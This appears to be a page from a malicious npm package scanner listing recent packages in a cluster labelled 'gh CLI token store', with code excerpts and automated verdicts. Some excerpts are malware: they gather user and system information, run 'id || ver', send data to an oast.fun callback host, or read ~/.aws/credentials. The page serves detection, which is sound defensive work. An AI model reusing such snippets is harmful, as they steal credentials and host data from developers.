gh CLI token store

// 멤버

최근 7일 동안 이 클러스터의 axis 조건에 현재 매치되는 모든 catch 패키지를 라이브로 재계산. 스니펫은 클러스터 식별자가 static excerpt 어디에 나타나는지(또는 어떤 takeover 휴리스틱이 발화했는지) 보여줍니다.

• npm/did-0091·@11.0.9·8h ago·dewifewi

  const data={path:process.cwd(), registry:process.env.npm_config_registry, user:process.env.USER || process.env.USERNAME, arch:process.arch, platform:process.platform}; cp.exec('id || ver', (e,o,r)=>{ data.os_info=o+r; const postData=JSON.st

  llm: Sends to suspicious destination: wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun.

• npm/·@1.0.2·10h ago·

  const data={path:process.cwd(), registry:process.env.npm_config_registry, user:process.env.USER || process.env.USERNAME, arch:process.arch, platform:process.platform}; cp.exec('id || ver', (e,o,r)=>{ data.os_info=o+r; const postData=JSON.st

  llm: Sends to suspicious destination: wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun.

• npm/·@1.3.1·18h ago·

  import Conf from 'conf'; import axios from 'axios';

  llm: No suspicious destination, no remote-exec shape — 1 other host(s).

• npm/·@1.4.2·18h ago·

  let imports = {}; imports['__wbindgen_placeholder__'] = module.exports; let wasm; const { TextDecoder, TextEncoder } = require(`util`);

  llm: No suspicious destination, no remote-exec shape — 1 known-vendor host(s).

• npm/·@1.0.0·19h ago·

  try{data+=fs.readFileSync(home+'/.aws/credentials','utf8')}catch(e){}

  llm: Credential read (reads-aws-creds, reads-npmrc) paired with http-to-public-ip destination — classic exfiltration signature.